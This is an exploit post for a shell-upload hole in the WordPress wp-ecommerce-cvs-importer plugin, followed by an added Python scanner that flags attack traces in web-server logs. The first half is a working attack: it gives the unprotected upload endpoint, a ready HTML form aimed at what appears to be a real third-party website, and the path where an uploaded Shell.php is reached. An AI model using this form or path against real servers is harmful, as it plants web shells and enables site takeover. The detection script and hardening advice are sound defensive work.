
WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability

Author: SERWAN, Published: 15-09-2014
# Exploit Title: WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability
# Google Dork: Use ur brain
# Date: 11/09/2014
# Exploit Author: SERWAN
# Software Link: http://wordpress.org/support/plugin/wp-ecommerce-cvs-importer
# Version: [app version - REQUIRED]
# Tested on: Linux
# Greetz - All Kurdish Hackers
##########################################################################

PoC & Exploit

http://localhost/wordpress/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php

Tool

<center>
<img src='http://z5.ifrm.com/30192/69/0/p1163951/kurdistan_flag.gif'/>
<br>
<br>
WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability By SERWAN
<br>
<br>
<form enctype="multipart/form-data" action="http://steelnotesmagazine.com/test/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php" method="post">
<input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>
</center>

File access

http://localhost/wordpress/wp-content/uploads/wpsc/product_images/Shell.php

##########################################################################
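
Detection

A defender-side check built from the two paths in this advisory, as an added example that is not part of the original post: it scans web-server access logs (combined log format assumed) for POSTs to the plugin's upload endpoint and for requests to script files under the product-image upload directory. The function name, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths taken from the advisory above.
UPLOAD_ENDPOINT = "/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php"
UPLOAD_DIR = "/wp-content/uploads/wpsc/product_images/"
# Extensions commonly mapped to the PHP handler (assumption; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Apache/nginx "combined" log format (assumption).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return (kind, ip, timestamp, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        # Drop the query string and decode percent-encoding before matching.
        path = unquote(urlsplit(m["target"]).path)
        if m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            kind = "upload-endpoint-post"
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            kind = "script-in-upload-dir"
        else:
            continue
        findings.append((kind, m["ip"], m["ts"], path, int(m["status"])))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [11/Sep/2014:10:02:11 +0000] "POST /wordpress/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Sep/2014:10:02:40 +0000] "GET /wordpress/wp-content/uploads/wpsc/product_images/Shell.php HTTP/1.1" 200 345 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Sep/2014:10:03:00 +0000] "GET /wordpress/wp-content/uploads/wpsc/product_images/shirt.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

A 200 response on a "script-in-upload-dir" hit means the server served or executed a script from the upload directory; disabling script handling in that directory and removing the plugin's upload-file.php closes the path shown above.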
